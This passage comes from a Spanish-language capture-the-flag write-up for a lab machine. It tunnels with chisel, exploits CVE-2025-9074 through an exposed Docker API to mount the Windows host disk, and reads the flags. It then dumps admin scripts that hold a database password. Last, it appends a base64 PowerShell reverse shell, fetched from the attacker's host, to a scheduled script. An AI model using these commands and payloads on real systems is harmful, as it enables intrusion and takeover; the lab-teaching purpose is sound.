ws://10.10.14.26:7070 </span></span><span class="line"><span class="cl">2025/12/07 05:46:42 client: Connected <span class="o">(</span>Latency 69.992734ms<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ ./chisel_linux server --reverse --port <span class="m">7070</span> </span></span><span class="line"><span class="cl">2025/12/06 23:46:17 server: Reverse tunnelling enabled </span></span><span class="line"><span class="cl">2025/12/06 23:46:17 server: Fingerprint mRjX1huwFOxQyx2VIUd6pbI7h8QJ+HXm0ArI/BWQGBM<span class="o">=</span> </span></span><span class="line"><span class="cl">2025/12/06 23:46:17 server: Listening on http://0.0.0.0:7070 </span></span><span class="line"><span class="cl">2025/12/06 23:47:12 server: session#1: tun: proxy#R:2375<span class="o">=</span>&gt;192.168.65.7:2375: Listening </span></span></code></pre></td></tr></table> </div> </div><h2 id="cve-2025-9074">CVE-2025-9074</h2> <p>Clonamos el repositorio <a href="https://github.com/OilSeller2001/PoC-for-CVE-2025-9074">PoC-for-CVE-2025-9074</a> que aloja el exploit. Este inicia verificando que la API este presente, intenta obtener la imagen alpine para crear un contenedor al que finalmente se accede a traves de <code>docker</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># Verify API</span> </span></span><span class="line"><span class="cl">http://127.0.0.1:2375/info </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># Tries to pull `alpine` image</span> </span></span><span class="line"><span class="cl"><span class="c1"># POST Request</span> </span></span><span class="line"><span class="cl">http://127.0.0.1:2375/images/create?fromImage<span class="o">=</span>alpine<span class="p">&amp;</span><span class="nv">tag</span><span class="o">=</span>latest </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># 2 - Create a Container with `alpine` Image with host filesystem bind-mounted at /mnt </span> </span></span><span class="line"><span class="cl"><span class="c1"># POST Request</span> </span></span><span class="line"><span class="cl">http://127.0.0.1:2375/containers/create </span></span><span class="line"><span class="cl"><span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Image&#34;</span>: alpine, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Cmd&#34;</span>: <span class="o">[</span><span class="s2">&#34;/bin/sh&#34;</span><span class="o">]</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Tty&#34;</span>: True, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;HostConfig&#34;</span>: <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Mounts&#34;</span>: <span class="o">[</span> </span></span><span class="line"><span class="cl"> <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Type&#34;</span>: <span class="s2">&#34;bind&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Source&#34;</span>: <span class="s2">&#34;/run/desktop/mnt/host/c/&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Target&#34;</span>: <span class="s2">&#34;/mnt&#34;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"> <span class="o">]</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># Starts the container</span> </span></span><span class="line"><span class="cl"><span class="c1"># POST Request</span> </span></span><span class="line"><span class="cl">http://127.0.0.1:2375/containers/&lt;container_id&gt;/start </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># Access container</span> </span></span><span class="line"><span class="cl">docker <span class="nb">exec</span> -it <span class="o">{</span>short_id<span class="o">}</span> sh </span></span></code></pre></td></tr></table> </div> </div><p>Tras ejecutar el exploit este logro la creacion del contenedor.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ python poc_cve_2025_9074.py </span></span><span class="line"><span class="cl">Please enter the host:port of the target Docker API <span class="o">(</span>Default: 127.0.0.1:2375<span class="o">)</span>: </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Target URL: http://127.0.0.1:2375 </span></span><span class="line"><span class="cl"><span class="o">[</span>1/5<span class="o">]</span> Checking Docker API connection status... </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Connection successful! Docker API exposure detected. </span></span><span class="line"><span class="cl">Detected presence of CVE-2025-9074 vulnerability. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>2/5<span class="o">]</span> Attempting to pull the required image: alpine... </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> Image pull failed. This might cause the next step to fail. Error: <span class="m">500</span> Server Error: Internal Server Error <span class="k">for</span> url: http://127.0.0.1:2375/images/create?fromImage<span class="o">=</span>alpine<span class="p">&amp;</span><span class="nv">tag</span><span class="o">=</span>latest </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>3/5<span class="o">]</span> Preparing malicious container creation request payload... </span></span><span class="line"><span class="cl"><span class="o">[</span>4/5<span class="o">]</span> Sending container creation request... </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Container created successfully. ID: dfe295213561 </span></span><span class="line"><span class="cl"><span class="o">[</span>5/5<span class="o">]</span> Starting container... </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Container started successfully! </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">==============================================</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> PoC completed. You can now manually connect to the newly created container to access the host<span class="s1">&#39;s filesystem: </span></span></span><span class="line"><span class="cl"><span class="s1"> docker exec -it dfe295213561 sh </span></span></span><span class="line"><span class="cl"><span class="s1">[*] Inside the container, the host&#39;</span>s bind-mounted path will be located at /mnt. </span></span><span class="line"><span class="cl"> Example: Type <span class="s1">&#39;ls /mnt&#39;</span> to view the host directory. </span></span><span class="line"><span class="cl"><span class="o">==============================================</span> </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><p>Especificamos la variable <code>DOCKER_HOST</code> y ejecutamos sh para acceder al contenedor, logrando acceso root y a la flag <code>user.txt</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ <span class="nb">export</span> <span class="nv">DOCKER_HOST</span><span class="o">=</span>tcp://127.0.0.1:2375 </span></span><span class="line"><span class="cl">❯ docker <span class="nb">exec</span> -it dfe295213561 sh </span></span><span class="line"><span class="cl">/ <span class="c1"># whoami</span> </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl"><span class="c1"># ... cut ...</span> </span></span><span class="line"><span class="cl">/mnt/Users/marcus <span class="c1"># cd Desktop</span> </span></span><span class="line"><span class="cl">/mnt/Users/marcus/Desktop <span class="c1"># ls</span> </span></span><span class="line"><span class="cl">desktop.ini user.txt </span></span><span class="line"><span class="cl">/mnt/Users/marcus/Desktop <span class="c1"># cat user.txt</span> </span></span><span class="line"><span class="cl">835f551bd7b3a052991e50195caeac60 </span></span><span class="line"><span class="cl">/mnt/Users/marcus/Desktop <span class="c1">#</span> </span></span></code></pre></td></tr></table> </div> </div><p>Tambien la flag <code>root.txt</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">/mnt/Users <span class="c1"># ls -lah administrator/desktop</span> </span></span><span class="line"><span class="cl">total <span class="m">0</span> </span></span><span class="line"><span class="cl">drwxrwxrwx <span class="m">1</span> root root 4.0K Nov <span class="m">10</span> 17:54 . </span></span><span class="line"><span class="cl">drwxrwxrwx <span class="m">1</span> root root 4.0K Nov <span class="m">3</span> 12:05 .. </span></span><span class="line"><span class="cl">-rwxrwxrwx <span class="m">1</span> root root <span class="m">282</span> Mar <span class="m">24</span> <span class="m">2025</span> desktop.ini </span></span><span class="line"><span class="cl">-r-xr-xr-x <span class="m">1</span> root root <span class="m">34</span> Dec <span class="m">6</span> 22:31 root.txt </span></span><span class="line"><span class="cl">/mnt/Users <span class="c1"># cat administrator/desktop/root.txt</span> </span></span><span class="line"><span class="cl">9ab22c7d0b315b476d2a05261b414a0d </span></span><span class="line"><span class="cl">/mnt/Users <span class="c1">#</span> </span></span></code></pre></td></tr></table> </div> </div><h1 id="user---administrator">User - Administrator</h1> <p>Localmente en el directorio de administrator encontramos multiples scripts restaurar al estado original la maquina, posiblemente <a href="https://learn.microsoft.com/en-us/powershell/module/scheduledtasks/new-scheduledtask?view=windowsserver2025-ps">ScheduledTask</a>.<br /> <div class="expand"> <button type="button" class="expand__button" aria-label="Expand Button"> <span class="expand-icon expand-icon__right"> <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path fill="currentColor" d="M9.29 15.88L13.17 12 9.29 8.12c-.39-.39-.39-1.02 0-1.41.39-.39 1.02-.39 1.41 0l4.59 4.59c.39.39.39 1.02 0 1.41L10.7 17.3c-.39.39-1.02.39-1.41 0-.38-.39-.39-1.03 0-1.42z"/></svg> </span> Expand me </button> <div class="expand__content"> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">/mnt/Users/Administrator/documents <span class="c1"># ls -lah</span> </span></span><span class="line"><span class="cl">total 8K </span></span><span class="line"><span class="cl">drwxrwxrwx <span class="m">1</span> root root 4.0K Nov <span class="m">11</span> 12:53 . </span></span><span class="line"><span class="cl">drwxrwxrwx <span class="m">1</span> root root 4.0K Nov <span class="m">3</span> 12:05 .. </span></span><span class="line"><span class="cl">lrwxrwxrwx <span class="m">1</span> root root <span class="m">37</span> Mar <span class="m">24</span> <span class="m">2025</span> My Music -&gt; /mnt/host/c/Users/Administrator/Music </span></span><span class="line"><span class="cl">lrwxrwxrwx <span class="m">1</span> root root <span class="m">40</span> Mar <span class="m">24</span> <span class="m">2025</span> My Pictures -&gt; /mnt/host/c/Users/Administrator/Pictures </span></span><span class="line"><span class="cl">lrwxrwxrwx <span class="m">1</span> root root <span class="m">38</span> Mar <span class="m">24</span> <span class="m">2025</span> My Videos -&gt; /mnt/host/c/Users/Administrator/Videos </span></span><span class="line"><span class="cl">-rwxrwxrwx <span class="m">1</span> root root <span class="m">508</span> Nov <span class="m">10</span> 17:55 container_cleanup.ps1 </span></span><span class="line"><span class="cl">-rwxrwxrwx <span class="m">1</span> root root <span class="m">453</span> Nov <span class="m">3</span> 12:16 copy.ps1 </span></span><span class="line"><span class="cl">-rwxrwxrwx <span class="m">1</span> root root <span class="m">445</span> Oct <span class="m">30</span> 16:29 db_cleanup.ps1 </span></span><span class="line"><span class="cl">-rwxrwxrwx <span class="m">1</span> root root <span class="m">402</span> Mar <span class="m">24</span> <span class="m">2025</span> desktop.ini </span></span><span class="line"><span class="cl">drwxrwxrwx <span class="m">1</span> root root 4.0K Oct <span class="m">30</span> 08:12 docker_setup </span></span><span class="line"><span class="cl">/mnt/Users/Administrator/documents <span class="c1"># cat copy.ps1</span> </span></span><span class="line"><span class="cl"><span class="nv">$localFile</span> <span class="o">=</span> <span class="s2">&#34;C:\Users\marcus\Desktop\user.txt&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$containerName</span> <span class="o">=</span> <span class="s2">&#34;web&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$containerFile</span> <span class="o">=</span> <span class="s2">&#34;/home/marcus/user.txt&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$attempts</span> <span class="o">=</span> <span class="m">50</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">for</span> <span class="o">(</span><span class="nv">$i</span> <span class="o">=</span> 1<span class="p">;</span> <span class="nv">$i</span> -le <span class="nv">$attempts</span><span class="p">;</span> <span class="nv">$i</span>++<span class="o">)</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="nv">$status</span> <span class="o">=</span> docker inspect -f <span class="s1">&#39;{{.State.Running}}&#39;</span> <span class="nv">$containerName</span> 2&gt;<span class="nv">$null</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="o">(</span><span class="nv">$status</span> -eq <span class="s2">&#34;true&#34;</span><span class="o">)</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> docker cp <span class="nv">$localFile</span> <span class="o">(</span><span class="nv">$containerName</span> + <span class="s2">&#34;:&#34;</span> + <span class="nv">$containerFile</span><span class="o">)</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span> <span class="k">else</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> Start-Sleep -Seconds <span class="m">5</span> </span></span><span class="line"><span class="cl"> <span class="nv">$i</span>-- </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Start-Sleep -Seconds <span class="m">2</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span><span class="line"><span class="cl">/mnt/Users/Administrator/documents <span class="c1"># cat container_cleanup.ps1</span> </span></span><span class="line"><span class="cl">start-sleep <span class="m">100</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">$containers</span> <span class="o">=</span> docker ps --format <span class="s2">&#34;{{.ID}} {{.Image}} {{.RunningFor}}&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">foreach <span class="o">(</span><span class="nv">$line</span> in <span class="nv">$containers</span><span class="o">)</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="nv">$parts</span> <span class="o">=</span> <span class="nv">$line</span> -split <span class="s1">&#39; &#39;</span> </span></span><span class="line"><span class="cl"> <span class="nv">$id</span> <span class="o">=</span> <span class="nv">$parts</span><span class="o">[</span>0<span class="o">]</span> </span></span><span class="line"><span class="cl"> <span class="nv">$image</span> <span class="o">=</span> <span class="nv">$parts</span><span class="o">[</span>1<span class="o">]</span> </span></span><span class="line"><span class="cl"> <span class="nv">$time</span> <span class="o">=</span> <span class="nv">$parts</span><span class="o">[</span>2<span class="o">]</span> </span></span><span class="line"><span class="cl"> <span class="nv">$unit</span> <span class="o">=</span> <span class="nv">$parts</span><span class="o">[</span>3<span class="o">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="o">(</span><span class="nv">$image</span> -in @<span class="o">(</span><span class="s1">&#39;docker_setup-nginx-php&#39;</span>, <span class="s1">&#39;docker_setup-mariadb&#39;</span><span class="o">))</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="k">continue</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="o">((</span><span class="nv">$unit</span> -eq <span class="s1">&#39;minutes&#39;</span> -and <span class="o">[</span>int<span class="o">]</span><span class="nv">$time</span> -gt 10<span class="o">)</span> -or </span></span><span class="line"><span class="cl"> <span class="o">(</span><span class="nv">$unit</span> -eq <span class="s1">&#39;hours&#39;</span><span class="o">)</span> -or </span></span><span class="line"><span class="cl"> <span class="o">(</span><span class="nv">$unit</span> -eq <span class="s1">&#39;days&#39;</span><span class="o">))</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> docker rm -f <span class="nv">$id</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"><span class="o">}</span>/mnt/Users/Administrator/documents <span class="c1"># cat db_cleanup.ps1</span> </span></span><span class="line"><span class="cl"><span class="nv">$containerName</span> <span class="o">=</span> <span class="s2">&#34;web&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$localSqlFile</span> <span class="o">=</span> <span class="s2">&#34;C:\Users\Administrator\Documents\02-cacti.sql&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$containerSqlFile</span> <span class="o">=</span> <span class="s2">&#34;/tmp/02-cacti.sql&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$dbUser</span> <span class="o">=</span> <span class="s2">&#34;cactidbuser&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$dbPass</span> <span class="o">=</span> <span class="s2">&#34;7pyrf6ly8qx4&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$dbHost</span> <span class="o">=</span> <span class="s2">&#34;mariadb&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$dbName</span> <span class="o">=</span> <span class="s2">&#34;cacti&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">docker cp <span class="nv">$localSqlFile</span> <span class="s2">&#34;</span><span class="k">$(</span><span class="nv">$containerName</span><span class="k">)</span><span class="s2">:</span><span class="nv">$containerSqlFile</span><span class="s2">&#34;</span> </span></span><span class="line"><span class="cl">docker <span class="nb">exec</span> -i <span class="nv">$containerName</span> bash -c <span class="s2">&#34;mysql -u </span><span class="nv">$dbUser</span><span class="s2"> -p</span><span class="nv">$dbPass</span><span class="s2"> -h </span><span class="nv">$dbHost</span><span class="s2"> </span><span class="nv">$dbName</span><span class="s2"> &lt; </span><span class="nv">$containerSqlFile</span><span class="s2">&#34;</span> </span></span><span class="line"><span class="cl">docker <span class="nb">exec</span> <span class="nv">$containerName</span> rm -f <span class="nv">$containerSqlFile</span> </span></span><span class="line"><span class="cl">/mnt/Users/Administrator/documents <span class="c1"># </span> </span></span></code></pre></td></tr></table> </div> </div> </div> </div></p> <p>Generamos una shell inversa con <a href="https://www.revshells.com/">revshells</a> para powershell.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">powershell -e <span class="nv">JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMgA2ACIALAA1ADUANQA1ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA</span><span class="o">==</span> </span></span></code></pre></td></tr></table> </div> </div><p>Agregamos la ejecucion al archivo <code>container_cleanup.ps1</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">/mnt/Users/administrator/documents <span class="c1"># wget 10.10.14.26/exploit.ps1</span> </span></span><span class="line"><span class="cl">Connecting to 10.10.14.26 <span class="o">(</span>10.10.14.26:80<span class="o">)</span> </span></span><span class="line"><span class="cl">saving to <span class="s1">&#39;exploit.ps1&#39;</span> </span></span><span class="line"><span class="cl">exploit.ps1 100% <span class="p">|</span>****************************************************************************************************************************************<span class="p">|</span> <span class="m">1841</span> 0:00:00 ETA </span></span><span class="line"><span class="cl"><span class="s1">&#39;exploit.ps1&#39;</span> saved </span></span><span class="line"><span class="cl">/mnt/Users/administrator/documents <span class="c1"># ls</span> </span></span><span class="line"><span class="cl">My Music My Videos copy.ps1 desktop.ini exploit.ps1 </span></span><span class="line"><span class="cl">My Pictures container_cleanup.ps1 db_cleanup.ps1 docker_setup </span></span><span class="line"><span class="cl">/mnt/Users/administrator/documents <span class="c1"># cat exploit.ps1</span> </span></span><span class="line"><span class="cl">powershell -e <span class="nv">JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMgA2ACIALAA1ADUANQA1ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA</span><span class="o">==</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">/mnt/Users/administrator/documents <span class="c1"># cat exploit.ps1 &gt;&gt; container_cleanup.ps1</span> </span></span><span class="line"><span class="cl">/mnt/Users/administrator/documents <span class="c1"># </span> </span></span></code></pre></td></tr></table> </div> </div><p>Luego de varios segundos se ejecuto y logramos una shell como administrator.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 